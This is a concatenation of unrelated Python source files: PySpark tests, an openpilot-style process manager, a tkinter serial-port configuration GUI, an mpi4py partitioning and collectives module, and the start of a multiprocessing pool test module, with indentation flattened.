|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_user_configuration(self):
"""Make sure user configuration is respected (SPARK-19307)"""
script = self.createTempFile("test.py", """
|from pyspark import SparkConf, SparkContext
|
|conf = SparkConf().set("spark.test_config", "1")
|sc = SparkContext(conf = conf)
|try:
| if sc._conf.get("spark.test_config") != "1":
| raise Exception("Cannot find spark.test_config in SparkContext's conf.")
|finally:
| sc.stop()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local", script],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode, msg="Process failed with error:\n {0}".format(out))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallelize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallelize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class KeywordOnlyTests(unittest.TestCase):
class Wrapped(object):
@keyword_only
def set(self, x=None, y=None):
if "x" in self._input_kwargs:
self._x = self._input_kwargs["x"]
if "y" in self._input_kwargs:
self._y = self._input_kwargs["y"]
return x, y
def test_keywords(self):
w = self.Wrapped()
x, y = w.set(y=1)
self.assertEqual(y, 1)
self.assertEqual(y, w._y)
self.assertIsNone(x)
self.assertFalse(hasattr(w, "_x"))
def test_non_keywords(self):
w = self.Wrapped()
self.assertRaises(TypeError, lambda: w.set(0, y=1))
def test_kwarg_ownership(self):
# test _input_kwargs is owned by each class instance and not a shared static variable
class Setter(object):
@keyword_only
def set(self, x=None, other=None, other_x=None):
if "other" in self._input_kwargs:
self._input_kwargs["other"].set(x=self._input_kwargs["other_x"])
self._x = self._input_kwargs["x"]
a = Setter()
b = Setter()
a.set(x=1, other=b, other_x=2)
self.assertEqual(a._x, 1)
self.assertEqual(b._x, 2)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_sample_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
manager.py
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
from typing import List, Tuple, Union
import cereal.messaging as messaging
import selfdrive.sentry as sentry
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
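# Rough outline of this module: manager_init() seeds Params, registration and logging,
# manager_prepare() lets each managed process prepare itself, manager_thread() supervises
# the managed processes based on deviceState, and manager_cleanup() stops them all.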
def manager_init() -> None:
# update system time from panda
set_time(cloudlog)
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params: List[Tuple[str, Union[str, bytes]]] = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("IsMetric", "1"),
("AutoLaneChangeEnabled", "0"),
("LaneChangeSpeedMin", "30"),
("ShowDebugUI", "0"),
("AutoResumeFromGas", "1"),
("AutoResumeFromGasSpeed", "30"),
("dp_lqr", "1"),
("OpkrPrebuiltOn", "0"),
("dpAccelProfileCtrl", "1"),
("dpAccelProfile", "1"),
("dpLaneLessMode", "2"),
("AutoCurveSpeedCtrl", "1"),
("OnBootNavi", "0"),
("AutoResumeFromBrakeRelease", "1"),
("AutoResumeFromBrakeReleaseDist", "10"),
("AutoResumeFromBrakeReleaseLeadCar", "1"),
("NaviDecelMarginDist", "140"),
("NaviDecelRate", "50"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightnessOff", "0"),
("OpkrUIBrightness", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE", "0"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not is_dirty():
os.environ['CLEAN'] = '1'
# init logging
sentry.init(sentry.SentryProject.SELFDRIVE)
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
device=HARDWARE.get_device_type())
def manager_prepare() -> None:
for p in managed_processes.values():
p.prepare()
def manager_cleanup() -> None:
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread() -> None:
if EON:
Process(name="autoshutdownd", target=launcher, args=("selfdrive.autoshutdownd", "autoshutdownd")).start()
system("am startservice com.neokii.optool/.MainService")
cloudlog.bind(daemon="manager")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
ignore: List[str] = []
if params.get("DongleId", encoding='utf8') in (None, UNREGISTERED_DONGLE_ID):
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
ignore += [x for x in os.getenv("BLOCK", "").split(",") if len(x) > 0]
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
print_timer = 0
while True:
sm.update()
not_run = ignore[:]
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print_timer = (print_timer + 1)%10
if print_timer == 0:
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
shutdown = True
params.put("LastManagerExitReason", param)
cloudlog.warning(f"Shutting down manager - {param} set")
if shutdown:
break
def map_exec():
os.system("am start com.mnsoft.mappyobn/com.mnsoft.mappy.MainActivity &") # map
def map_hide():
os.system("am start --activity-task-on-home com.opkr.maphack/com.opkr.maphack.MainActivity") # map backgrand
def map_return():
os.system("am start --activity-task-on-home com.mnsoft.mappyobn/com.mnsoft.mappy.MainActivity")
def main() -> None:
param_navi = Params().get("OnBootNavi")
if param_navi is not None:
navi_on_boot = int(param_navi)
else:
navi_on_boot = 0
if navi_on_boot:
map_exec()
preBuiltOn = Params().get_bool("OpkrPrebuiltOn")
preBuiltFile = '/data/openpilot/prebuilt'
if not os.path.isdir("/data/openpilot"):
pass
elif not os.path.isfile(preBuiltFile) and preBuiltOn:
os.system("cd /data/openpilot; touch prebuilt")
elif os.path.isfile(preBuiltFile) and not preBuiltOn:
os.system("cd /data/openpilot; rm -f prebuilt")
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
if navi_on_boot:
map_hide()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
sentry.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
try:
managed_processes['ui'].stop()
except Exception:
pass
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
IOMaster_GUI_WithBoard.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("500x300")
ser = serial.Serial(port='COM5', baudrate=115200)
def read_from_port(ser):
while True:
reading = ser.read()
print(reading)
if reading == b'3':
messagebox.showinfo("Works", "Pushed Button")
def sendCommand(command):
ser.write(command.encode('ascii', 'ignore'))
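# Illustrative sketch (not part of the original GUI): the single-character serial
# protocol assumed by the button handlers below, exercised without any Tk widgets.
# The command strings ('v*', 'f*', 's<8 bits>\0') mirror the ones sent by the
# "Configure" and "Send Data" buttons; the board-side behaviour is an assumption.
def _example_headless_configure_and_send():
    sendCommand('v1')            # select 5V
    sendCommand('f2')            # select 100kHz
    sendCommand('s10101010\0')   # send one byte of data, null-terminated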
class Label:
def __init__(self, win, text, clmn, row):
self.lbl=ttk.Label(win, text=text)
self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values, clmn, row):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
self.cb.grid(column=clmn, row=row)
self.cb.current(1)
class Button:
def __init__(self, win, text, clmn, row):
self.btn=ttk.Button(win, text=text, command=self.press)
self.btn.grid(column=clmn, row=row)
def press(self):
btn_text = self.btn.cget('text')
#Push Actions for "Configure" Button
if btn_text == "Configure":
OutputVariables = "Protocol: " + cb0.cb.get() + '\n' + "Voltage: " + cb1.cb.get() + '\n' + "Frequency: " + cb2.cb.get() + "\n"
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, OutputVariables)
OutConfigTxt.configure(state="disable")
protocol = cb0.cb.get()
voltage = cb1.cb.get()
frequency = cb2.cb.get()
if voltage == "3.3V":
sendCommand('v0')
if voltage == "5V":
sendCommand('v1')
if voltage == "12V":
sendCommand('v2')
if voltage == "24V":
sendCommand('v3')
#Wait for OKAY (z) before moving on
window.after(1000)
if frequency == "1kHZ":
sendCommand('f0')
if frequency == "10kHZ":
sendCommand('f1')
if frequency == "100kHZ":
sendCommand('f2')
if frequency == "1MHZ":
sendCommand('f3')
#wait for OKAY before finishing loop. (exit as necessary)
#Push Actions for "Send Data" Button
if btn_text == "Send Data":
dataToSend = DataText.get('1.0', END)
dataToSend = dataToSend.rstrip()
for letter in dataToSend:
            if letter != '0' and letter != '1':
                messagebox.showinfo("Error", "Invalid Data.\n 0s and 1s Only")
return
        if dataToSend == '':
            messagebox.showinfo("Error", "Please Enter Data to Send.\n 0s and 1s Only")
            return
        if len(dataToSend) != 8:
            messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n 0s and 1s Only")
return
dataToSend = 's' + dataToSend + '\0'
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
sendCommand(dataToSend) #send command to the board
#declare Visual Components
lbl0 = Label(window, "Protocol", 0, 0)
lbl1 = Label(window, "Voltage:", 0, 1)
lbl2 = Label(window, "Frequency:", 0, 2)
lbl3 = Label(window, "Data to Send:", 0, 3)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485"], 1, 0)
cb0.cb.current(2) #Set to SPI
cb0.cb.configure(state = "disabled") #Only want SPI For now
cb1 = combobox(window, ["3.3V","5V", "12V", "24V" ], 1, 1)
cb2 = combobox(window, ["1kHz", "10kHz", "100kHz", "1MHz"], 1, 2)
btn1 = Button(window, "Configure", 2, 1) #Send configure Data
btn2 = Button(window, "Send Data", 2, 3) #Send Input Data
DataText = TK.Text(window, height=1, width=17) #Box to input Binary Data to send
DataText.grid(column=1, row=3)
OutConfigTxt = TK.Text(window, height = 5, width = 36, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
def main():
serialThread = threading.Thread(target=read_from_port, args=(ser,))
serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
mpi.py
|
#!/usr/bin/env python
import sys
import time
import threading
import traceback
import numpy
from mpi4py import MPI
from . import mpi_pool
from .mpi_pool import MPIPool
_registry = {}
if 'pool' not in _registry:
import atexit
pool = MPIPool(debug=False)
_registry['pool'] = pool
atexit.register(pool.close)
comm = pool.comm
rank = pool.rank
def static_partition(tasks):
size = len(tasks)
segsize = (size+pool.size-1) // pool.size
start = pool.rank * segsize
stop = min(size, start+segsize)
return tasks[start:stop]
def work_balanced_partition(tasks, costs=None):
if costs is None:
        costs = numpy.ones(len(tasks))
if rank == 0:
segsize = float(sum(costs)) / pool.size
loads = []
cum_costs = numpy.cumsum(costs)
start_id = 0
for k in range(pool.size):
stop_id = numpy.argmin(abs(cum_costs - (k+1)*segsize)) + 1
stop_id = max(stop_id, start_id+1)
loads.append([start_id,stop_id])
start_id = stop_id
comm.bcast(loads)
else:
loads = comm.bcast()
if rank < len(loads):
start, stop = loads[rank]
return tasks[start:stop]
else:
return tasks[:0]
INQUIRY = 50050
TASK = 50051
def work_share_partition(tasks, interval=.02, loadmin=1):
loadmin = max(loadmin, len(tasks)//50//pool.size)
rest_tasks = [x for x in tasks[loadmin*pool.size:]]
tasks = tasks[loadmin*rank:loadmin*rank+loadmin]
def distribute_task():
while True:
load = len(tasks)
if rank == 0:
for i in range(pool.size):
if i != 0:
load = comm.recv(source=i, tag=INQUIRY)
if rest_tasks:
if load <= loadmin:
task = rest_tasks.pop(0)
comm.send(task, i, tag=TASK)
else:
comm.send('OUT_OF_TASK', i, tag=TASK)
else:
comm.send(load, 0, tag=INQUIRY)
if comm.Iprobe(source=0, tag=TASK):
tasks.append(comm.recv(source=0, tag=TASK))
if tasks[-1] == 'OUT_OF_TASK':
return
time.sleep(interval)
tasks_handler = threading.Thread(target=distribute_task)
tasks_handler.start()
while True:
if tasks:
task = tasks.pop(0)
if task == 'OUT_OF_TASK':
tasks_handler.join()
return
yield task
def work_stealing_partition(tasks, interval=.0001):
tasks = static_partition(tasks)
out_of_task = [False]
def task_daemon():
while True:
time.sleep(interval)
while comm.Iprobe(source=MPI.ANY_SOURCE, tag=INQUIRY):
src, req = comm.recv(source=MPI.ANY_SOURCE, tag=INQUIRY)
if req == 'STOP_DAEMON':
return
elif tasks:
comm.send(tasks.pop(), src, tag=TASK)
elif src == 0 and req == 'ALL_DONE':
comm.send(out_of_task[0], src, tag=TASK)
elif out_of_task[0]:
comm.send('OUT_OF_TASK', src, tag=TASK)
else:
comm.send('BYPASS', src, tag=TASK)
def prepare_to_stop():
out_of_task[0] = True
if rank == 0:
while True:
done = []
for i in range(1, pool.size):
comm.send((0,'ALL_DONE'), i, tag=INQUIRY)
done.append(comm.recv(source=i, tag=TASK))
if all(done):
break
time.sleep(interval)
for i in range(pool.size):
comm.send((0,'STOP_DAEMON'), i, tag=INQUIRY)
tasks_handler.join()
if pool.size > 1:
tasks_handler = threading.Thread(target=task_daemon)
tasks_handler.start()
while tasks:
task = tasks.pop(0)
yield task
if pool.size > 1:
def next_proc(proc):
proc = (proc+1) % pool.size
if proc == rank:
proc = (proc+1) % pool.size
return proc
proc_last = (rank + 1) % pool.size
proc = next_proc(proc_last)
while True:
comm.send((rank,None), proc, tag=INQUIRY)
task = comm.recv(source=proc, tag=TASK)
if task == 'OUT_OF_TASK':
prepare_to_stop()
return
elif task == 'BYPASS':
if proc == proc_last:
prepare_to_stop()
return
else:
proc = next_proc(proc)
else:
if proc != proc_last:
proc_last, proc = proc, next_proc(proc)
yield task
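# Illustrative sketch (not part of the original module): how the generator-style
# partitioners above are typically consumed on every MPI rank. The squaring step
# is a hypothetical stand-in for real per-task work.
def _example_partition_usage():
    results = []
    for task in work_stealing_partition(list(range(100))):
        results.append(task * task)
    # gather() (defined below) concatenates the per-rank results on the root rank
    return gather(numpy.asarray(results))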
def bcast(buf, root=0):
buf = numpy.asarray(buf, order='C')
shape, dtype = comm.bcast((buf.shape, buf.dtype))
if rank != root:
buf = numpy.empty(shape, dtype=dtype)
comm.Bcast(buf, root)
return buf
## Useful when sending large batches of arrays
#def safe_bcast(buf, root=0):
def reduce(sendbuf, op=MPI.SUM, root=0):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.shape == shape and sendbuf.dtype.char == mpi_dtype)
recvbuf = numpy.zeros_like(sendbuf)
comm.Reduce(sendbuf, recvbuf, op, root)
if rank == root:
return recvbuf
else:
return sendbuf
def allreduce(sendbuf, op=MPI.SUM):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.shape == shape and sendbuf.dtype.char == mpi_dtype)
recvbuf = numpy.zeros_like(sendbuf)
comm.Allreduce(sendbuf, recvbuf, op)
return recvbuf
def gather(sendbuf, root=0):
# if pool.debug:
# if rank == 0:
# res = [sendbuf]
# for k in range(1, pool.size):
# dat = comm.recv(source=k)
# res.append(dat)
# return numpy.vstack([x for x in res if len(x) > 0])
# else:
# comm.send(sendbuf, dest=0)
# return sendbuf
sendbuf = numpy.asarray(sendbuf, order='C')
mpi_dtype = sendbuf.dtype.char
if rank == root:
size_dtype = comm.gather((sendbuf.size, mpi_dtype), root=root)
_assert(all(x[1] == mpi_dtype for x in size_dtype if x[0] > 0))
counts = numpy.array([x[0] for x in size_dtype])
displs = numpy.append(0, numpy.cumsum(counts[:-1]))
recvbuf = numpy.empty(sum(counts), dtype=sendbuf.dtype)
comm.Gatherv([sendbuf.ravel(), mpi_dtype],
[recvbuf.ravel(), counts, displs, mpi_dtype], root)
return recvbuf.reshape((-1,) + sendbuf[0].shape)
else:
comm.gather((sendbuf.size, mpi_dtype), root=root)
comm.Gatherv([sendbuf.ravel(), mpi_dtype], None, root)
return sendbuf
def allgather(sendbuf):
sendbuf = numpy.asarray(sendbuf, order='C')
shape, mpi_dtype = comm.bcast((sendbuf.shape, sendbuf.dtype.char))
_assert(sendbuf.dtype.char == mpi_dtype or sendbuf.size == 0)
counts = numpy.array(comm.allgather(sendbuf.size))
displs = numpy.append(0, numpy.cumsum(counts[:-1]))
recvbuf = numpy.empty(sum(counts), dtype=sendbuf.dtype)
comm.Allgatherv([sendbuf.ravel(), mpi_dtype],
[recvbuf.ravel(), counts, displs, mpi_dtype])
return recvbuf.reshape((-1,) + shape[1:])
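# Illustrative sketch (not in the original module): the numpy-based collective
# wrappers above mirror their raw mpi4py counterparts, e.g.
def _example_collectives():
    local = numpy.arange(4) * rank
    total = allreduce(local)          # elementwise sum over all ranks
    everything = allgather(local)     # concatenation along the first axis
    return total, everything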
def alltoall(sendbuf, split_recvbuf=False):
if isinstance(sendbuf, numpy.ndarray):
mpi_dtype = comm.bcast(sendbuf.dtype.char)
sendbuf = numpy.asarray(sendbuf, mpi_dtype, 'C')
nrow = sendbuf.shape[0]
ncol = sendbuf.size // nrow
segsize = (nrow+pool.size-1) // pool.size * ncol
sdispls = numpy.arange(0, pool.size*segsize, segsize)
sdispls[sdispls>sendbuf.size] = sendbuf.size
scounts = numpy.append(sdispls[1:]-sdispls[:-1], sendbuf.size-sdispls[-1])
else:
assert(len(sendbuf) == pool.size)
mpi_dtype = comm.bcast(sendbuf[0].dtype.char)
sendbuf = [numpy.asarray(x, mpi_dtype).ravel() for x in sendbuf]
scounts = numpy.asarray([x.size for x in sendbuf])
sdispls = numpy.append(0, numpy.cumsum(scounts[:-1]))
sendbuf = numpy.hstack(sendbuf)
rcounts = numpy.asarray(comm.alltoall(scounts))
rdispls = numpy.append(0, numpy.cumsum(rcounts[:-1]))
recvbuf = numpy.empty(sum(rcounts), dtype=mpi_dtype)
comm.Alltoallv([sendbuf.ravel(), scounts, sdispls, mpi_dtype],
[recvbuf.ravel(), rcounts, rdispls, mpi_dtype])
if split_recvbuf:
return [recvbuf[p0:p0+c] for p0,c in zip(rdispls,rcounts)]
else:
return recvbuf
def sendrecv(sendbuf, source=0, dest=0):
if source == dest:
return sendbuf
if rank == source:
sendbuf = numpy.asarray(sendbuf, order='C')
comm.send((sendbuf.shape, sendbuf.dtype), dest=dest)
comm.Send(sendbuf, dest=dest)
return sendbuf
elif rank == dest:
shape, dtype = comm.recv(source=source)
recvbuf = numpy.empty(shape, dtype=dtype)
comm.Recv(recvbuf, source=source)
return recvbuf
def _assert(condition):
if not condition:
sys.stderr.write(''.join(traceback.format_stack()[:-1]))
comm.Abort()
def register_for(obj):
global _registry
key = id(obj)
# Keep track of the object in a global registry. On slave nodes, the
# object can be accessed from global registry.
_registry[key] = obj
keys = comm.gather(key)
if rank == 0:
obj._reg_keys = keys
return obj
def del_registry(reg_keys):
if reg_keys:
def f(reg_keys):
from mpi4pyscf.tools import mpi
mpi._registry.pop(reg_keys[mpi.rank])
pool.apply(f, reg_keys, reg_keys)
return []
|
test_pool_tee.py
|
import unittest
from contextlib import redirect_stdout
from ctypes import cdll
import random
import os
import sys
import multiprocessing
from multiprocessing import Pipe, Value
import logging
from typing import Tuple, Any
from batchkit.utils import tee_to_pipe_decorator, NonDaemonicPool, FailedRecognitionError
"""
In this test module, there are primarily three things under test:
1 -- tee_to_pipe_decorator
2 -- NonDaemonicPool
3 -- Our intended usage pattern of using them together when the pool worker proc
uses a subproc and gets back return value and exception.
"""
logger = logging.getLogger("test_pool_tee")
# logger.level = logging.DEBUG
logger.level = logging.INFO
log_stream_handler = logging.StreamHandler(sys.stdout)
# Toggle this to get useful debug trace.
# logger.addHandler(log_stream_handler)
test_root = os.path.dirname(os.path.realpath(__file__))
libblah_path = os.path.join(test_root, 'resources/libsegv.so')
lock = multiprocessing.Lock()
count_terms = Value('i', 0, lock=True)
count_exceptions = Value('i', 0, lock=True)
